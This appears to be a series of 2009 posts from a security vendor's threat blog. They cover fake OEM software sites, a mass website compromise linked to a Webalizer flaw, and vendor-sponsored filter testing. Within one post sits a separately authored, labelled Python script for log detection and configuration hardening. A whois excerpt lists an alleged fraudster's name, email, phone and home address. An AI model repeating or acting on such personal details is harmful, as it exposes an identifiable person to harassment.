While these sites may look real, touting Microsoft and Verisign certifications, they are far from legitimate. Many of these sites come back as top results in Google and Yahoo searches. Alarmingly, many URL filters are NOT able to detect and block these sites.

Here is just one example of the many sites currently up and running. 

The company name given on many of these fraudulent sites is "OEM Downloads Inc", “Authorized Software Reseller” or “Download Software”. You can check for this at the bottom of the page where there is often a copyright notice. Throughout the sites there are tell-tale signs that this is a shady website that should not be trusted.

Straight from their FAQ..."you will not receive any printed documentation (licensing or instructions) - just files and instructions in .txt format, and will not be able to register this software online." This was the company's explanation for the low prices they are able to offer. If you are not able to register the product, it is not a real copy or you won’t be getting it in the first place.

Another sign is that they are offering Adobe Creative Suite software on the site. Adobe does not distribute or allow OEM distribution of their software. In fact, OEM software is rarely sold outside of a hardware bundle, like a new computer system.

Unsurprisingly, the whois information shows Russian ownership for most of these domains. For example:

   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.ENCATGPC.COM
   Name Server: NS2.ENCATGPC.COM
   Status: ok
   Updated Date: 20-jul-2009
   Creation Date: 06-jan-2009
   Expiration Date: 06-jan-2010

   Valery Rigalo vrigalo77@inbox.ru +7.4999384712
   Novomariinskaya str., 11/1, apt. 38
   Moscow, N/A, RU 193901

   Domain Name: computercodeplanet.com
   Record last updated at 2009-01-06 12:08:08
   Record created on 2009/1/6
   Record expired on 2010/1/6

   Domain servers in listed order:
   ns1.encatgpc.com
   ns2.encatgpc.com


The Threat Prevention Team has also noticed that many compromised sites, including some government and educational sites, link back to these domains, which further substantiates the fraudsters' criminal intentions. eSoft is flagging these URLs as “Phishing & Fraud.”

Friday, August 21, 2009

Mass Compromise of Sites with Webalizer

The eSoft Threat Prevention Team has been tracking a rapidly growing pattern of website compromises over the last 24 hours. Since Thursday, Aug 20, eSoft has seen over 6,000 compromised URLs of the pattern:


And the numbers are growing at a rate of several hundred per hour. A Google search for inurl:050609wareza shows around 30,000 such compromised sites.

The compromised sites typically carry nonsense text and a series of pictures of pills, with links to more compromised sites and to dangerous scripts that trigger well-known exploits, including the recent exploit of the ActiveX streaming video control discussed in this eSoft security bulletin:


In some cases, such as when eSoft researchers navigated to a compromised site using Firefox on Windows, a redirection to files express occurred:

In testing, when the exploit succeeded the payload was an information-stealing Trojan, though the payload has varied. Because the payloads have weak coverage from AV vendors and change frequently, blocking the offending websites is the best way to prevent infection.

eSoft’s Threat Prevention Team notes that around one third of the compromised sites include a webalizer directory, which may indicate a correlation with a recently published Webalizer exploit. The exploit allows an attacker to execute arbitrary code, often with elevated privileges; more information on it can be found below. Until a patch is released, administrators should configure Webalizer not to perform reverse DNS lookups.


eSoft will continue to cover this threat and to protect customers from these websites by flagging them as Compromised. At the start of research Google had flagged very few of these sites as malicious, but increasing numbers are now being identified by its cloud security as well. Other security engines tested, including Web of Trust, Norman and McAfee SiteAdvisor, have very poor detection of these sites at this time.
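Two checks a site administrator could run against this outbreak, as an added example that is not from the original post or from eSoft: scan an access log for requests to pages carrying the 050609wareza indicator, and audit a webalizer.conf for run-time reverse DNS lookups, which Webalizer performs only when DNSCache names a cache file and DNSChildren is greater than zero (its documented default is 0, disabled). The indicator string is from the post and the directive names are Webalizer's own; the log lines, the configuration fragment and the URL layout containing the indicator are constructed.

```python
import re

# Added example (not eSoft's own tooling).  The 050609wareza indicator comes
# from the post; DNSCache / DNSChildren are Webalizer's documented directives.
# The access-log lines, the config fragment and the URL layout are constructed.

INDICATOR = re.compile(r"050609wareza", re.I)
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def hits_in_log(lines):
    """Return (client_ip, path) for every request whose path carries the
    indicator; hits mean injected pages on this host are already being served."""
    found = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and INDICATOR.search(m.group(2)):
            found.append((m.group(1), m.group(2)))
    return found


def _directives(conf_text):
    """Yield (keyword, value) for each non-comment line of a webalizer.conf;
    Webalizer treats a line whose first character is '#' as a comment."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        yield parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")


def reverse_dns_enabled(conf_text):
    """True when Webalizer would resolve visitor IPs at run time: that needs
    DNSCache to name a cache file AND DNSChildren > 0 (default 0 = disabled)."""
    cache, children = "", 0
    for key, value in _directives(conf_text):
        if key == "dnscache":
            cache = value
        elif key == "dnschildren":
            children = int(value) if value.isdigit() else 0
    return bool(cache) and children > 0


def harden_conf(conf_text):
    """Return the config with lookups disabled: DNSChildren forced to 0 and
    DNSCache commented out, every other line left exactly as it was."""
    out, seen_children = [], False
    for raw in conf_text.splitlines():
        line = raw.strip()
        key = "" if not line or line.startswith("#") else line.split(None, 1)[0].lower()
        if key == "dnscache":
            out.append("#" + raw)             # keep it visible, but inactive
        elif key == "dnschildren":
            out.append("DNSChildren 0")
            seen_children = True
        else:
            out.append(raw)
    if not seen_children:
        out.append("DNSChildren 0")           # make the safe setting explicit
    return "\n".join(out) + "\n"


# Constructed sample data (not real logs or a real site's configuration).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Aug/2009:10:15:02 -0600] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Aug/2009:10:16:40 -0600] "GET /050609wareza/index.html HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [21/Aug/2009:10:17:01 -0600] "GET /webalizer/ HTTP/1.1" 200 918 "-" "Mozilla/4.0"',
]
SAMPLE_CONF = """# constructed webalizer.conf fragment
LogFile     /var/log/httpd/access_log
OutputDir   /var/www/html/webalizer
DNSCache    dns_cache.db
DNSChildren 10
"""

if __name__ == "__main__":
    for ip, path in hits_in_log(SAMPLE_LOG):
        print(f"indicator hit: {ip} requested {path}")
    print("reverse DNS enabled:", reverse_dns_enabled(SAMPLE_CONF))
    print(harden_conf(SAMPLE_CONF))
```

For a single run the same effect is had on the command line with `webalizer -N 0` (or by not passing `-D`), but the config file is what the cron job reads, so that is the place to fix it. A log hit on the indicator path means the injected pages are being served from your host, not just linked to it, and the site should be treated as compromised regardless of what the Webalizer audit says.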

Thursday, July 2, 2009

Have you heard the one about the independent testing lab?

They always independently verify that their client is the best.

Independent tests these days are a joke.

In the last week, two different reports from December 2008 came to my attention: one from Cascadia Labs commissioned by Trend Micro and the other from Tolly Group commissioned by Websense. They both have sections on the effectiveness of the major web filtering companies in blocking malicious websites.

Of these two reports, the Cascadia Labs report was slightly fairer, ranking Trend Micro as able to block 53% of web threats (the highest, presumably with anti-virus enabled as well as URL filtering), followed by McAfee (42%), Blue Coat (31%), Websense (23%) and IronPort (20%). I'm ignoring the SurfControl entry (9%) because, since Websense bought SurfControl, the product is essentially defunct and SurfControl partners are being urged to move to Websense.

The Tolly Group report said, "In tests with 379 URLs containing binary exploits or compromise code, Websense blocked 99% of URLs, versus other vendors who blocked between 53% to 91%." Let's look just at the results for Websense versus Trend Micro in terms of exploit detection in the two tests:

   Report           Trend Micro   Websense
   Cascadia Labs    53%           23%
   Tolly Group      53%           99%

Well, Trend Micro is consistent, but depending on who you ask, Websense is either twice as good or half as good. But here's the kicker: the Tolly report says, "All the URLs tested were mined from Websense ThreatSeeker network." So what they're saying is that Websense is very good (but not perfect) at detecting exploits on URLs it already knows to have exploits.

Now here's the bottom line. A lot of folks make claims about security, but it's a hard thing to verify. eSoft, the sponsor of this blog, for example, detected 35k new malicious URLs last week and has over 1.5m recently verified malicious URLs in its database at the moment. The combined lists of Google, Trend Micro, Sunbelt, PayPal, Mozilla, AOL and Consumer Reports, on the other hand, hold only 318k [source: stopbadware.org]. But those might be 318k not covered by the eSoft list, so the question becomes: how do you test these types of products?

I have some thoughts on how truly independent testing could be done, including the collection and verification of malicious URLs without relying on a particular list that some vendor may already include directly, but first I want to put the question out there. What testing methodology should be used in a fair comparison of the ability of different products to block access to compromised, phishing and otherwise malicious websites? Should the tests include things like malware call-home addresses? If so, where should the URLs come from? What is a fair sample size? What is a fair timeframe from first detection? Any feedback would be appreciated.

Friday, May 22, 2009

Return of the ThreatCenter blog

We've been dormant for a while, but it's time to bring back the ThreatCenter blog. eSoft's work in the web security area (identification of malicious and compromised websites, not securing of web servers) has produced amazing results in huge volumes, and it's time to share some of those results with the greater community.

We recently shared some data on a few days' worth of fraudulent pharmacy sites with Richard Stiennon, who published the information on his ThreatChaos blog (if you haven't read the article, please check it out, and digg it while you're there). eSoft is seeing these sites at an increasing rate that is fairly staggering.

In our next post, we'll show some of the uglier examples of what we call "pagerank bombs" -- compromised sites used to host hidden links rather than malware.